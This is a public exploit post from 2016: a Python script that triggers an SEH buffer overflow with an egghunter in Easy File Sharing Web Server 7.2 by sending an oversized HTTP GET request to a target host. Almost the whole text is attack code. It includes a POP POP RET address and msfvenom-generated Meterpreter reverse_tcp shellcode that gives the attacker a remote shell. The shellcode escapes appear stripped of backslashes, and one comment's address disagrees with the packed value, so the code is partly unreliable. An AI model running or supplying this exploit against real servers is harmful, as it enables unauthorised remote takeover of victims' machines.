Easy File Sharing Web Server 7.2 SEH Buffer Overflow
Posted on 03 September 2016
#!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [Should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [IP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b 'x2fx5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "xd9xc9xbfx35xfex35x6exd9x74x24xf4x5ex29xc9xb1" "x4ex31x7ex17x83xc6x04x03x4bxedxd7x9bx6axffxc1" "x10xa8xf4xa8xf1x79x4bx8dxf4xcfx36xbfxbex1ex4d" "xd8x43x1axa9x5bx81x1fxddx18x78xb2x84x32xfbx61" "x03x6fx9exe5x0fx3dx70x9bxbbxd1x2ex81x1cxa6x79" "x74x27x17xdex04x4bx10x89x6bxd3xe4xc0x6cx47x32" "xf4x44xebx7ex1exd7x62x4cx56x0fx58x2ex1ax12xc9" "x0ex12x81x30xc9x30x3cx76xc0x7axc0xe0x3bxbax6f" "xfcx5bxe3x3fx1cxa6x37x3dxf5x6bxf3x1axe0x82x85" "xc8xeexcexc8xa2xf9x0ex84xe3xacx36xe6x3bxc0xe7" "x61xc1xd3xefxf1x4exc3xdexfdxc7x77x5bx51xbcxab" "x2dxb9x65x03xc1x01x47xbex50xe2xfcx96x96xabxd3" "xf8x53x15x69xc6xcdx34xdbxd3xcdxccxddx02x24x31" "x9fxc0xcex41x53xf0xe0xb1xd7x96xfcx16xe4x10xba" "xd0xd0x10x02x40xdcx33x9dxb5x35xbbx3fx4fx93x11" "x9ax16x63x1bx60xa1xabx5ex05xf2x7cx02x57x99x90" "x88x4dxcfx60x3ax9fx77x8ax9exffx1cx91x61xecx5e" "xd4x08x54x76xfbxdbx45xdax8fx01xbaxedx01xefx09" "xc1x5dx8fx2bx24x69xc0xbfx44x03x6ex62x7cx39x6a" "xabx18x70xe5xffxe6x33x3bx2bx37xf1xb3x92xd6x59" "xccxc8xcax8dx9dx34xf9x89xf7x26xbcx60xa1xdfxcb" "xa8x9dxd2x9fx33x5ax48xb2x8dxc5xaax9fx3cx37x0b" "x98x35x70x3bxe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "xebx06x90x90" # 0x1000108b [ImageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") exploit = junk + nseh + seh + egghunter + shellcode + "x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0 ") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!"
